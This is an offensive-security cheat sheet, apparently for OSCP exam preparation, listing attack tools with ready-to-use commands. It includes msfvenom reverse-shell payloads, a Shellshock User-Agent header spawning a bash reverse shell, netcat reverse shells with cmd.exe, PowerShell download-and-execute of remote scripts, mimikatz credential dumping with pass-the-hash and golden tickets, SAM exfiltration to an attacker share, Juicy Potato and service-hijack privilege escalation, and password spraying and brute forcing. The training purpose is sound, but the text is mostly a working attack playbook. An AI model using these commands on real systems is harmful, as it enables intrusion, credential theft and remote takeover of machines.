Attack Tools
ATTACK TOOLS
…tools and uses vary
…take a look at the use of each before attempting
PAYLOAD CREATION
msfvenom
shellter
PASSWORD CRACKING
cewl (create word lists)
hashcat
john the ripper
LaZagne (pw dump)
EXPLOIT SEARCH
searchsploit
metasploit
PRIVILEGE IMPERSONATION
JuicyPotato
mimikatz
sam dump (hklmsam)
PRIVESC TOOLS
UPnP
PSexec
PowerUp.ps1
Kerberoast
Windows-Privesc-Check2
fgdump.exe
COMPILER
gcc
i686-w64-mingw32-gcc
PASSWORD SPRAYING
crackmapexec
SQL EXPLOITATION
sqlmap
BRUTE FORCE
crackmapexec
hydra
medusa
wpscan
ncrack
WEB
dirb
dirbuster
curl
gobuster
nikto
hydra
wpscan
burpsuite
whatweb
google bot (change agent)
dig
PROTOCOL ENUMERATION
SNMP
showmount (NFS)
rpcinfo (RPC)
impacket-rpcdump
nmap search engine (NSE)
impacket-lookupsid
enum4linux
dig (LDAP)
impacket-GetNPUsers (LDAP)
smbmap (SMB)
nbtscan
SMTP
REMOTE INFORMATION
rpcinfo
example bash scripts
CONNECTIONS
ssh
smb
netcat (nc)
socat
sqsh (SQL)
mysql (SQL)
ftp
impacket-smbserver
pth-winexe (kerberos)
crackmapexec
rpcclient
rdesktop
xfreerdp
evil-winrm (WINRM)
proxychains (pivoting)
smbclient
pwsh (internal power shell)
netstat (to verify connections)
WEBSITES TO REFERENCE
GTFO Bins – great for priv esc
TTY Spawn – fix yer shell
Reverse Shells – common commands
Reverse Shells – another great source
Hash Examples – listed for hashcat
WhiteWinterWolf Web Shell – useful for web uploads
MSFVENOM
…used to create payloads of all sorts
…these examples are only the common uses
# ASP NET
msfvenom -p windows/shell/reverse_tcp LHOST=192.168.119.188 LPORT=443 -f asp > shell2.asp
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.119.188 LPORT=443 -f asp > rev.asp
# JAVA
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.119.188 LPORT=80 -f raw > reverse.jsp
# WORDPRESS AND OTHER WEBS
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.11.0.4 LPORT=443 -f elf > shell.elf
msfvenom -p java/shell_reverse_tcp LHOST=192.168.119.188 LPORT=80 -f war -o tomcat.war
# MICROSOFT WORD
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.119.188 LPORT=80 -f hta-psh -o msfvevil.hta
# TRUNCATE VIA PYTHON TO 50 CHARACTERS PER LINE
# PRIV ESC BINARIES
msfvenom -a x64 --platform Windows -p windows/shell_reverse_tcp LHOST=192.168.119.188 LPORT=80 -f exe -o reverse_3333.exe
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.119.188 LPORT=80 -f exe -o reverse_80.exe
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.119.188 LPORT=80 -f exe > shellpingit.exe
# ETERNAL BLUE
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.32 LPORT=443 EXITFUNC=thread -b "x00x0ax0dx5cx5fx2fx2ex40" -f py -v shellcode -a x86
# LINUX BINARY CREATION
msfvenom -p linux/x86/exec CMD=/bin/sh -f elf -o scp
# PLACE FILE ON TARGET IN /tmp
# PERMISSIONS: chmod file to 755
# RUN ROOT BINARY REFERENCING scp
# WINDOWS MALICIOUS INSTALL FILE
# CHANGE REGISTRY FOR ALWAYS PRIV'D INSTALLS (will work, or give error)
reg query HKCUSOFTWAREPoliciesMicrosoftWindowsInstaller /v AlwaysInstallElevated
# CREATE MALICIOUS BINARIES/DLL
msfvenom -p windows/shell_reverse_tcp -e x86/shikata_ga_nai LHOST=10.10.10.299 LPORT=80 -f exe -o payload.exe
msfvenom -p windows/exec cmd="C:tmpPayload.exe" -f msi-nouac -o shell.msi
# ON WINDOWS
msiexec /quiet /qn /i "C:tmpshell.msi"
# OR CREATE DLL DIRECTLY
msfvenom -p windows/shell_reverse_tcp lhost=10.10.10.299 lport=80 -f dll -o shell.dll
# ON WINDOWS - COPY TO VALID WRITEABLE LOCATION
copy shell.dll C:Python27wlbsctrl.dll
SHELLTER
… antivirus evasion and binary creation
… GUI for creating binaries
shellter
CEWL
… custom word list generator
cewl http://website.com -w wordlist.txt
# SPECIFY CHARACTER LENGTH
cewl http://website.com -m 7
# FIND EMAILS ON WEBPAGE
cewl https://website.com/ -n -e
# COUNT TIMES THAT A WORD APEARS
cewl htts://website.com/ -c
# SPECIFY DEPTH
cewl https://website.com/ -d 2
# EXAMPLE
cewl -d 2 -m 5 -w wordlist.txt https://website.com/
HASHCAT
…a common technique is identifying the hash type before cracking
…then attempt to find the useful module for that type
…then crack the hash (rockyou.txt may need to be unzipped by default)
hashid file.hash
hashcat -h | grep <type_hash>
hashcat -m 0 file.hash /usr/share/wordlist/rockyou.txt
JOHN THE RIPPER
… password cracker
… uses CPU rather than GPU and can be slower than hashcat
john file.hash
# SHOW RESULTS
john --show file.hash
# USE WORDLIST
john file.hash -wordlist="/usr/share/wordlist/rockyou.txt"
# REPORT PROGRESS EVERY 3 SECONDS
--progress-every=3
# SPECIFY FORMAT
--format=krb5tgs
LAZAGNE PASSWORD DUMP
… this will dump NTLM hashes to crack with hashcat or john
… use the second half of the hash with hashcat -m 1000 (NTLM)
.lazagne_pw_dump.exe all
# OUTPUT
Administrator:500:aad3b435beeeeeeed3b435b51404ee:6b0e72ee64ea42ca092beeeeeeefa46e:::
Guest:501:aad3b435eeeeeeeaad3b435b51404ee:31d6cfeeeeeeee31b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51eeeeeee3b435b51404ee:31d6ceeeeeeee931b73c59d7e0c089c0:::
SupportAccount:504:aad3b435b51404eeeeeee435b51404ee:3b458b0b1294c03efeeeeeeef381498:::
name:1001:aad3b435b5eeeeeeee3b435b51404ee:b40c7060e1beeeeeee1564a1bf33d48:::
# HASHCAT USING 'name'
echo "b40c7060e1beeeeeee1564a1bf33d48" > secondhalf.hash
hashcat -m 1000 secondhalf.hash /usr/share/wordlist/rockyou.txt
# HASHCAT OUTPUT
Session..........: hashcat
Filename..: /usr/share/wordlists/rockyou.txt
Status...........: Cracked
Hash.Mode........: 1000 (NTLM)
b40c7060e1beeeeeee1564a1bf33d48:password
SEARCHSPLOIT
…a database of all exploits is kept on kali
…these can be accessed through the searchsploit tool
…use the name and version of the target software for your search
# STANDAR SEARCH (PROBABLY TONS OF RESULTS
searchsploit software
# REFINE SEARCH WITH VERSION NUMBER
searchsploit sofware version 1.2.3
# VIEW AND USE EXPLOITS
searchsploit -x exploit
searchsploit -m exploit
# EXAMPLE
searchsploit tomcat
------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------- ---------------------------------
4D WebSTAR 5.3/5.4 Tomcat Plugin - Remote Buffer Overflow | osx/remote/25626.c
Apache 1.3.x + Tomcat 4.0.x/4.1.x mod_jk - Chunked Encoding Denial of Se | unix/dos/22068.pl
Apache Commons FileUpload and Apache Tomcat - Denial of Service | multiple/dos/31615.rb
# Grab or view the exploit (example from first entry)
searchsploit -m osx/remote/25626.c
METASPLOIT
…NOTE: not to be used on the OSCP exam
…this is an automated framework for exploits and shells
sudo msfconsole -q -x "use exploit/multi/handler;
set PAYLOAD windows/meterpreter/reverse_tcp;
<span custom-style="BoldCodeRed">set AutoRunScript post/windows/manage/migrate;
set LHOST 10.10.1.299;
set LPORT 80;
run"</span>
JUICY POTATO
… test script found here
… list of CLSIDs found here
whoami /all
PRIVILEGES INFORMATION
----------------------------------------------------------------------------------------
SeImpersonatePrivilege Impersonate a client after authentication Enabled
----------------------------------------------------------------------------------------
JUICY POTATO - WIN 7/8.1/10/SV2008/SV2012/SV2016
# jp port needs to be same as jp port
# always test connection first...
C:wampwwwPHPupload2fileManagerusersU1nc.exe 192.168.119.299 3000 -e C:WindowsSystem32cmd.exe
# CAN PUT ALL OF THE RESULTS IN A BATCH FILE AND RUN THAT BATCH
echo <netcat command> > rev3000.bat.bat
# JuicyPotato command (absolute path)
jp -l 3000 -p C:wampwwwPHPupload2fileManagerusersU1rev3000.bat -t * -c {4991d34b-80a1-4291-83b6-3328366b9097}
# JuicyPotoato command (relative path)
jp -l 3000 -p rev3000.bat -t * -c {03ca98d6-ff5d-49b8-abc6-03dd84127020}
MIMIKATZ
… Windows cache dumper from memory
# RUN FIRST
privilege::debug
# ENABLE LOGS TO REFER BACK
log nameoflog.log
# FIRST COMMAND TO DUMP PASSWORDS/HASHES
sekurlsa::logonpasswords
# LISTING OF OTHER COMMANDS AVAILABLE
sekurlsa::logonPasswords full
sekurlsa::tickets /export
sekurlsa::pth /user:Administrateur /domain:winxp /ntlm:f193d757b4d487ab7e5a3743f038f713 /run:cmd
kerberos::list /export
kerberos::ptt c:chocolate.kirbi
kerberos::golden /admin:administrateur /domain:chocolate.local /sid:S-1-5-21-130452501-2365100805-3685010670 /krbtgt:310b643c5316c8c3c70a10cfb17e2e31 /ticket:chocolate.kirbi
crypto::capi
crypto::cng
crypto::certificates /export
crypto::certificates /export /systemstore:CERT_SYSTEM_STORE_LOCAL_MACHINE
crypto::keys /export
crypto::keys /machine /export
vault::cred
vault::list
token::elevate
vault::cred
vault::list
lsadump::sam
lsadump::secrets
lsadump::cache
token::revert
lsadump::dcsync /user:domainkrbtgt /domain:thinc.local
sekurlsa::pth /user:Administrateur /domain:chocolate.local /ntlm:cc36cf7a8514893efccd332446158b1a
sekurlsa::pth /user:Administrateur /domain:chocolate.local /aes256:b7268361386090314acce8d9367e55f55865e7ef8e670fbe4262d6c94098a9e9
sekurlsa::pth /user:Administrateur /domain:chocolate.local /ntlm:cc36cf7a8514893efccd332446158b1a /aes256:b7268361386090314acce8d9367e55f55865e7ef8e670fbe4262d6c94098a9e9
sekurlsa::pth /user:Administrator /domain:WOSHUB /ntlm:{NTLM_hash} /run:cmd.exe
sekurlsa::ekeys
sekurlsa::dpapi
sekurlsa::minidump lsass.dmp
kerberos::ptt [email protected]
kerberos::ptt [email protected]
kerberos::golden /user:utilisateur /domain:chocolate.local /sid:S-1-5-21-130452501-2365100805-3685010670 /krbtgt:310b643c5316c8c3c70a10cfb17e2e31 /id:1107 /groups:513 /ticket:utilisateur.chocolate.kirbi
kerberos::golden /domain:chocolate.local /sid:S-1-5-21-130452501-2365100805-3685010670 /aes256:15540cac73e94028231ef86631bc47bd5c827847ade468d6f6f739eb00c68e42 /user:Administrateur /id:500 /groups:513,512,520,518,519 /ptt /startoffset:-10 /endin:600 /renewmax:10080
kerberos::golden /admin:Administrator /domain:CTU.DOMAIN /sid:S-1-1-12-123456789-1234567890-123456789 /krbtgt:deadbeefboobbabe003133700009999 /ticket:Administrator.kiribi
kerberos::tgt
kerberos::purge
SAM FILE DUMPS (WINDOWS)
… Windows keeps its credentials in the SAM file
… these can been exported and seen… then the hash can be cracked
reg save hklmsam c:tmpsam
reg save hklmsystem c:tmpsystem
# use file transfers to receive these (like SMB)
copy sam \192.168.119.188share
copy system \192.168.119.188share
# use sam dump and list the two files
samdump2 system sam
alice::1004:aad[redacted]eaad3b435b51404ee:b74242f37e47[redacted]ebcac4ffe:::
# the revealed hash can now be cracked
# for hashcat, use the second part of the hash (after the : character)
hashcat -m 1000 alice3.hash /usr/share/wordlists/rockyou.txt
WINDOWS XP SPECIFIC
UPnP EXPLOIT
… if you find yourself on an XP system, this will likely work
… this resource explains the hack
# DON'T FORGET TO UPLOAD NETCAT (nc.exe)
C:Inetpub>sc config upnphost binpath= "C:Inetpubwwwrootnc.exe 192.168.119.299 80 -e C:WINDOWSSystem32cmd.exe"
C:Inetpub>sc config upnphost obj= ".LocalSystem" password= ""
C:Inetpub>sc qc upnphost
C:Inetpub>sc config SSDPSRV start= auto
C:Inetpub>net start SSDPSRV
C:Inetpub>net start upnphost
# WILL NEED TO BE READY TO GENERATE ANOTHER SHELL QUICKLY
PSEXEC
… this is a standard Windows binary issued by Microsoft
… in conjunction with other attacks, it allows for great privilege escalation
… reverse_80.exe was created using msfvenom
psexec.exe -i -accepteula -d -s c:tmpreverse_80.exe
POWERUP MODULE
… found here (only one example of many)
c:tmp> powershell -ExecutionPolicy Bypass
c:tmp> import-module .PowerUp.ps1
c:tmp> Invoke-AllChecks
# DOWNLOAD AND USE
C:tmp> powershell.exe Invoke-WebRequest -Uri "http://192.168.1.299:443/PowerUp.ps1" -OutFile "C:tmppu.ps1"
C:tmp> powershell.exe import-module C:tmppu.ps1
# RUN REMOTELY (IN MEMORY)
powershell -nop -exec bypass -c "IEX (New-Object Net.webClient).DownloadString('https://192.168.1.299:443/PowerUp.ps1'); Invoke-AllChecks"
# POSSIBLE OTHER COMMAND FOR EXEC BYPASS
C:powershell.exe -nop -exec bypass
KERBEROAST
… found here
c:tmp>powershell -ExecutionPolicy Bypass
PS C:tmp> Import-Module .Invoke-Kerberoast.ps1
PS C:tmp> Invoke-Kerberoast -OutputFormat Hashcat | fl
# USE HASHCAT TO CRACK
# ELIMINATE ALL LINE BREAKS FROM THE OUTPUT
hashcat -m 13100
FGDUMP
… found here
.fgdump.exe
# THREE FILES WILL BE CREATED
127.0.0.1.pwdump
2022-04-26-17-23-28.failed
2022-04-26-17-23-28.fgdump-log
# VIEW FILE FOR RESULTS
type 127.0.0.1.pwdump
WINDOWS-PRIVESC-CHECK (v2)
… found here
.wpc2.exe --audit -a -o report-%COMPUTERNAME%
# THREE FILES WILL BE CREATED
report-name.html
report-name.txt
report-name.xml
# OPEN THE HTML IN YOUR FAVORITE BROWSER
# THIS WILL SHOW SEVERITY OF EACH FOUND ITEM
GCC
I686-W64-MINGW32-GCC
…the extention of the exploit will reveal the programming language
…compilations are based on the language
…an example for “C” language is:
i686-w64-mingw32-gcc 25626.c -o pwned.exe
# flags may be used for different systems
# -m32 us used for 32-bit systems
# -wall is another common flag that may work (avoids easy errors)
# OTHER EXAMPLES AS SEEN
gcc exp.c -o exp -lrt
CRACKMAPEXEC
… this is fantastic for “spray and pray” password scanning
… often used with credentials that are already found to test other systems
crackmapexec smb 10.10.1.299
crackmapexec smb 10.10.1.299 -u users.txt -p password.txt --continue-on-success >> cme_spray_10.10.1.299.txt
crackmapexec smb 10.10.1.299 -u username.txt -p password.txt --continue-on-success >> sprayoutput24.txt
crackmapexec winrm 10.10.1.299 -d user -u Administrator -p /usr/share/wordlists/rockyou.txt
SQLMAP
…NOTE… this is not usable on an OSCP exam
http://ip.com/whatever.php?id=1
INTERCEPT WITH BURP - NO FORWARD
RIGHT CLICK AND HIT 'SAVE ITEM'
USE SQLMAP WITH SAVED ITEM
sqlmap -r <file> --banner #takes a while to run
sqlmap -r <file> --users
sqlmap -r <file> --is-dba
sqlmap -r <file> --dbs
sqlmap -r <file> -D <db> --tables --threads=10
sqlmap -r <file> -D <db> -T <table> --columns --threads=10
sqlmap -r <file> -D <db> -T <table> --columns --hex --threads=10 (sometime it shows more)
sqlmap -r <file> -D <db> -T <table> --columns --dump --threads=10
sqlmap -r <file> -D <db> -T <table> --columns --dump --force-pivoting --threads=10
# RUN FOR ALL TABLES AND COLUMNS
sqlmap -r <file> -D ecomerce -T user --columns --dump --force-pivoting --threads=10
# TRY A SYSTEM SHELL
sqlmap -r mssql --os-shell --threads 10
os-shell> whoami
HYDRA
… login brute-forcer that supports tons of protocols
… supports the following:
Cisco AAA, Cisco auth, Cisco enable, CVS, FTP, HTTP(S)-FORM-GET, HTTP(S)-FORM-POST, HTTP(S)-GET, HTTP(S)-HEAD, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MySQL, NNTP, Oracle Listener, Oracle SID, PC-Anywhere, PC-NFS, POP3, PostgreSQL, RDP, Rexec, Rlogin, Rsh, SIP, SMB(NT), SMTP, SMTP Enum, SNMP v1+v2+v3, SOCKS5, SSH (v1 and v2), SSHKEY, Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP
# USAGE
hydra -l <username> -P <password list> <Target hostname> <service module> <post request parameters>
# EXPLANATION
{page URL}:{Request post body form parameters}:S={Find whatever in the page after succesfully logged in}
# EXAMPLE
hydra -l admin -P /usr/share/wordlists/rockyou.txt testasp.vulnweb.com http-post-form "/Login.asp?RetURL=%2FDefault%2Easp%3F:tfUName=^USER^&tfUPass=^PASS^:S=logout" -vV -f
hydra -l user -P sitewordlist.txt 10.10.1.299 http-post-form "/department/login.php:username=admin&password=^PASS^:Invalid Password!"
hydra -l user -P rockyoubackwards.txt 10.10.1.229 -t 4 -vV ssh
MEDUSA
… login brute-forcer for remote protocols
… uses concurrent connection through thread-based parallel testing
# USAGE
Medusa [-h host|-H file] [-u username|-U file] [-p password|-P file] [-C file] -M module [OPT]
# EXAMPLE
medusa -M ssh -H host.txt -U users.txt -p password
medusa -M ftp -s -h host -u username -p password
medusa -M mysql -h host -u user -p password
medusa -M smbnt -h somehost -C pwdump.txt -m PASS:HASH -m GROUP:DOMAIN
medusa -M mysql -h host -U users.txt -p <hash> -m PASS:HASH
medusa -M pop3 -m DOMAIN:foo.com -U accounts.txt -p password
medusa -M smtp-vrfy -m VERB:VRFY -U accounts.txt -p domain.com
medusa -M smtp -m EHLO:world -U accounts.txt -p password
medusa -h 10.11.1.31 -u admin -P rockyou.txt -M http -m DIR:/admin
# LIST WITH user:password (full.txt)
medusa -M smbnt -C full.txt -H hosts.txt
# SOME EXAMPLES USE A LIST OF USERS/ACCOUNTS
WPSCAN
… simple enumeration of a WordPress site (web)
# SCAN SIMPLE WEBSITE
wpscan --url http://website.com
# SCAN FOR PUBLIC VIEWABLE USERS (u = users)
wpscan --url http://website.com -e u
# TRY KNOWN PASSWORDS
wpscan --url http://website.com -passwords file/path/passwords.txt
# TRY WITH ADMIN USERNAME
wpscan --url http://10.10.1.229 --passwords /usr/share/wordlists/rockyou.txt --usernames admin
# POSSIBLE EXPLOIT THROUGH 404 PAGE
# CHANGE 404 PAGE - PANEL --> APEARANCE --> EDITOR
WordPress: Reverse Shell
curl http://10.10.1.299/wp-content/themes/twentytwelve/404.php
NCRACK
… network authentication and cracking
# USE DEFAULT LISTS
ncrack 192.168.1.299:21 -v
# USE A DEFINED LIST
ncrack -U path/of/usernamelist -P path/of/passwordlist <ip address or domain name>:port -v
DIRB
… web content scanner (directory finder)
# SIMPLE SCAN USING DEFAULT LISTS
dirb http://website.com/
# FOCUS ON A DIRECTORY
dirb http://website.com/directory/
# SPECIFIC EXTENSION SEARCH
-X .php # EXAMPLE page.php
# SHOW ALL FOUND EXAMPLES OF PARAMETER
-H .php # EXAMPLE php.ini
# SAVE OUTPUT TO A FILE
-o outputfile.txt
# IGNORE A CERTAIN CODE RETURN
-N 302
# TELL DIRB NOT TO AVOID WARNINGS
-w
# SLOW DOWN YOUR SEARCH IN CERTAIN ENVIRONMENTS
-z 100
# DO NOT SCAN RECURSIVELY
-r
# SHOW "NOT FOUND" PAGES
-v
# AVOID USING THE "/" FOR CERTAIN CASES
-t
# HTTP AUTHORIZATION ON SOME SITES
-u anyuser:anypass
# SCAN A DIFFERENT PORT (PROXY)
dirb http://website.com -p website.com:port
DIRBUSTER
… a Java GUI with multithread
… looks for directories and files
… just specify your wordlist and options and click START
# A DEFAULT WORDLIST DIRECTORY
/usr/share/dirbuster/wordlists/
CURL
… transfer data to or from a server
… supported protocols:
HTTP, FTP, IMAP, POP3, SCP, SFTP, SMTP, TFTP, TELNET, LDAP, FILE
… NOTE: you can right click on a BurpSuite request to save as a curl command
curl http://website.com
curl http://sub.website.com
-i # Include Response Headers
-I # Show Info Only
-L # Follow Redirects
# GRAB A FILE
curl ftp://ftp.website.com/file.jpeg
# SAVE FILE TO LOCAL COMPUTER
curl -o filename.zip ftp://ftp.website.com/file.zip
curl 10.10.0.299:443/shell.pl > shell.pl
# THE BIT "O" SAVES IT AS THE SAME FILENAME
curl -O ftp://ftp.website.com/file.zip
# RESUME AFTER INTERRUPTION
curl -C - -O ftp://ftp.website.com/file.zip
# USER AUTHENTICATION
curl -u user:password -O ftp://ftp.website.com/file.zip
# UPLOAD A FILE TO FTP SERVER
curl -u user:password -T file.zip ftp://ftp.website.com/
# USE CUSTOM REQUEST METHOD LIKE POST
curl -X POST https://website.com/
# SEND ADDTIONAL FIELDS
curl -d "user=user&pass=pass" -X https://website.com/login
# SPECIFY CONTENT TYPE
curl -d '{json}' -H 'Content-Type: application/json' https://website.com/login
curl --data "param1=value1" --data "param2=value2" https://website.com/resource.cgi
# EMPTY DATA
curl --data '' https://website.com/resource.cgi
curl -X POST https://website.com/resource.cgi
curl --request POST https://website.com/resource.cgi
# SEND COMPLETE FILE
curl --form "[email protected]" https://website.com/resource.cgi
# DISCOVERY TRICKS
curl 10.11.1.71 -s -L | grep "title|href" | sed -e 's/^[[:space:]]*//'
curl 10.11.1.71 -s -L | html2text -width '99' | uniq
# EMAMPLE TO SEE NETCAT HELP USING STDOUT (2>&1;)
curl -H "User-Agent: () { :; }; /bin/bash -c 'echo aaaa; nc -h 2>&1; echo zzzz;'" http://10.10.1.299/cgi-bin/admin.cgi -s | sed -n '/aaaa/{:a;n;/zzzz/b;p;ba}'
# EMAMPLE REVERSE SHELL USING STDOUT
curl -H "User-Agent: () { :; }; /bin/bash -c 'echo aaaa; bash -i >& /dev/tcp/10.10.0.299/443 0>&1; echo zzzz;'"
http://10.10.1.299/cgi-bin/admin.cgi -s | sed -n '/aaaa/{:a;n;/zzzz/b;p;ba}'
# PASS AN ARGUMENT USING A SHELL
curl localhost:8080/start_page.php?page=cmd.php --data 'cmd=id'
GOBUSTER
… brute-force directories, files, and DNS
… great to find vhosts
gobuster [mode] [options]
gobuster dir -u https://website.com/
# USE A SPECIFIED WORDLIST
gobuster dir -u https://website.com/ -w /usr/share/wordlist/directories.txt
# SPECIFY FILE TYPES
gobuster dir -u https://website.com/ -w wordlist.txt -x php,html,htm
# WILDCARD
--wildcard
# PRINT URL WHEN EXTRACTING
gobuster dir -e -u http://website.com/ --wildcard
# HIDE STATUS CODE
-n --wildcard
# SET THREAD NUMBER
-t 100
# TIMEOUT PARAMETER
--timeout 5s
# ENUMERATE DIRECTORIES WITH SPECIFIC EXTENSIONS
-x .php
# FOLLOW REDIRECTS
-r
# USE AUTHORIZATION
-U user -P password
# OBTAIN SUB DOMAINS WHILE BRUTE-FORCING
-z
# PROXY
-p 'https://website.com:8080' -u 'http://website.com/'
# FULL COMMAND WITH CODE ELIMINATION
gobuster -u http://10.10.1.299/ -w /usr/share/seclists/Discovery/Web_Content/common.txt -s '200,204,301,302,307,403,500' -e
# USING A CGI LIST AFTER CGI DISCOVERY
gobuster -u http://10.10.1.299/ -w /usr/share/seclists/Discovery/Web_Content/cgis.txt -s '200,204,403,500' -e
NIKTO
… performs fast security/information checks
… web server and CGI scanner
… tries to find SQL injectsion, XSS, versions, subdomains, and more
nikto -h website.com # DEFAULTS TO PORT 80
nikto -h https://website.com
# SCAN A LIST OF DOMAINS IN A FILE
nikto -h domains.txt
# EXPORT RESULTS TO FILE
-o nikto_output.txt
-o nikto_output.txt -Format csv
HYDRA
… login cracker supporting multiple protocols
… support list includes:
Cisco AAA, Cisco auth, Cisco enable, CVS, FTP, HTTP(S)-FORM-GET, HTTP(S)-FORM-POST, HTTP(S)-GET, HTTP(S)-HEAD, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MySQL, NNTP, Oracle Listener, Oracle SID, PC-Anywhere, PC-NFS, POP3, PostgreSQL, RDP, Rexec, Rlogin, Rsh, SIP, SMB(NT), SMTP, SMTP Enum, SNMP v1+v2+v3, SOCKS5, SSH (v1 and v2), SSHKEY, Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP
hydra -l <username> -P <password list> <Target hostname> <service module> <post request parameters>
hydra <Target_IP> ssh -l <username> -p <password> -s 22 -vV
hydra <Target_IP> ssh -l <username> -P <password_file> -s 22 -vV
hydra -l <username> -p <password> ftp://<Target_IP>
hydra -l <username> -p <password> telnet://<Target_IP>
hydra -l admin -P /usr/share/wordlists/rockyou.txt sub.website.com http-post-form "/Login.asp?RetURL=%2FDefault%2Easp%3F:tfUName=^USER^&tfUPass=^PASS^:S=logout" -vV -f
hydra -L user.txt -p 123 192.168.1.299 ftp
hydra -L user.txt -P pass.txt 192.168.1.299 ftp
hydra -l user -P /usr/share/wordlists/rockyou.txt ssh://10.10.1.299
# SAVE OUTPUT TO FILE
-o hydra_output.txt
# SPECIFY THE PORT
-s 8000
# MULTIPLE HOSTS
-M hsots.txt
# ADD PARAMETER TO FINISH HOSTS WHEN FOUND
-F
WPSCAN (WORDPRESS)
… simple scanner for Word Press sites
wpscan --url http://10.10.1.299 --passwords /usr/share/wordlists/rockyou.txt --usernames admin
BURPSUITE
… greatest webs tool ever
… recommend downloading latest community edition here
… simply install with the bash script that was downloaded
cd ~/Downloads
sudo bash ./burpsuite_install.sh
WHATWEB
… simply identifies websites
whatweb website.com
GOOGLE BOT
…sometimes sites won’t allow public searches
…so change into a google bot
…use burpsuite to change your agent
# NEWER AGENT HEADER TO USE
Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
# OLD AGENT HEADER SOMETIMES WORKS
Googlebot/2.1 (+http://www.google.com/bot.html)
DIG
… domain information groper – DNS queries
dig website.com
# ONLY A RECORDS
+short
# REMOVE COMMENT LINES
+nocomments
# QUERY ALL DNS TYPES / RECORDS
dig website.com ANY
# TRACE DNS PATHS
+trace
# ASK A SPECIFIC NAME SERVER
@8.8.8.8
SNMP
PORT UDP 161
… discovers network management information about a system
# SNMPWALK
snmpwalk -c public -v1 -t 10 10.10.1.299
# SNMP-CHECK
snmp-check -c public -v 1 10.10.1.299
SHOWMOUNT (NFS)
… grab information about Network File Shares
showmount -a 10.10.1.299
# DIRECTORIES ONLY
showmount -d 10.10.1.299
# SHOW EXPORTED FILE SYSTEMS
showmount -e 10.10.1.299
RPCINFO (RPC)
… makes a call to the server and reports findings
rpcinfo 10.10.1.299
rpcinfo -s
rpcinfo -p
EXAMPLE BASH SCRIPTS
… use these to create your own
# TRY SSH CONNECTIONS
for user in user1 user2 user3 user4; do
( echo USER ${user}; sleep 2s; echo PASS abcd; sleep 2s; echo LIST; sleep 2s; echo quit) | nc -nvC 10.10.1.299 110; done
# TACKING ON COMMANDS WITH WEB SHELL PAGE (USE '&' CHARACTER)
10.10.1.229 & powershell -NoP -NonI -W Hidden -Exec Bypass......
EXPLORE FILES RECURSIVELY
… you can download an entire directory
… you can further grep recursively
# SAVES DIRECTORY AS THE IP... THEN GREP THAT DIRECTORY
wget -r ftp://user:[email protected]
grep -r '=sa' 10.10.1.229
NMAP SEARCH ENGINE (NSE)
… the scripting engine will automatically look for vulnerabilities
… similar to metasploit, but able to be used on OSCP exam
nmap --script-help "define search"
--script nbstat.nse ip
--script smb-os-discovery ip
--script smbenum-shares -p 139,445 ip
--script=smb-os-discovery
--script smb-buln*
--script ms-sql*
--script ldap-rootdse
--script ldap-search
IMPACKET
… there are several modules for Impacket… all useful!
… here’s a list of what’s installed by default on Kali:
impacket-addcomputer
impacket-GetNPUsers
impacket-mimikatz
impacket-ping6
impacket-samrdump
impacket-split
impacket-atexec
impacket-getPac
impacket-mqtt_check
impacket-psexec
impacket-secretsdump
impacket-ticketConverter
impacket-dcomexec
impacket-getST
impacket-mssqlclient
impacket-raiseChild
impacket-services
impacket-ticketer
impacket-dpapi
impacket-getTGT
impacket-mssqlinstance
impacket-rdp_check
impacket-smbclient
impacket-wmiexec
impacket-esentutl
impacket-GetUserSPNs
impacket-netview
impacket-reg
impacket-smbexec
impacket-wmipersist
impacket-exchanger
impacket-goldenPac
impacket-nmapAnswerMachine
impacket-registry-read
impacket-smbrelayx
impacket-wmiquery
impacket-findDelegation
impacket-karmaSMB
impacket-ntfs-read
impacket-rpcdump
impacket-smbserver
impacket-GetADUsers
impacket-kintercept
impacket-ntlmrelayx
impacket-rpcmap
impacket-sniff
impacket-getArch
impacket-lookupsid
impacket-ping
impacket-sambaPipe
impacket-sniffer
# COMMON ONES USED
# LDAP
impacket-GetNPUsers thinc/10.10.1.299 -dc-ip 10.10.1.299 -request
# RPC
impacket-rpcdump 10.10.1.299
# SMB
impacket-lookupsid 10.10.1.299
# CONNECTIONS TO WINDOWS
sudo impacket-psexec user:password@ip
# CREATE SMB v1 SERVER
impacket-smbserver share smbserver
# CREATE SMB v2 SERVER - DOESN'T ALWAYS WORK
impacket-smbserver -smb2support <folder> <sharename>
# CONNECTION TO SQL
impacket-mssqlclient [email protected]
# FIND SPECIFIC BINARIES
impacket-rpcdump -p 135 10.10.1.229 | grep .exe
# NOTE THAT SOME EXPLOITS REQUIRE PYTHON2
# INSTALL PYTHON2 FIRST...
https://www.kali.org/docs/general-use/using-eol-python-versions/
# THEN INSTALL PIP TO THE NEW PYENV
└─$ curl https://bootstrap.pypa.io/pip/2.7/get-pip.py --output get-pip.py
└─$ sudo python2 get-pip.py
└─$ python2 -m pip install impacket
ENUM4LINUX
… enumeration of Windows Samba systems
enum4linux 10.10.1.299
# VERBOSE
enum4linux -v 10.10.1.299
# RUN ALL SCRIPTS
enum4linux -a 10.10.1.299
# USE CREDENTIALS
enum4linux -u user -p password -U 10.10.1.299
# PULL USER NAMES
enum4linux -r 10.10.1.299
# LIST GROUPS
enum4linux -G 10.10.1.299
# LIST SHARES
enum4linux -S 10.10.1.299
# DICTIONARY ATTACK TO LIST SHARES
enum4linux -s shares.txt 10.10.1.299
# ENUMERATE THE OS
enum4linux -o 10.10.1.299
# PRINTER INFORMATION
enum4linux -i 10.10.1.299
SMBMAP
PORT 139
PORT 445
… enumeration Samba shares
smbmap -H ip/hostname
# USING CREDENTIALS
smbmap -u user -p password -H host
# COMMAND EXECUTION
smbmap -u user -p 'password' -d domain -x 'net group /domain' -H host
# USING HASH
smbmap -u user -p 'hashpart1:hashpart2' -H host
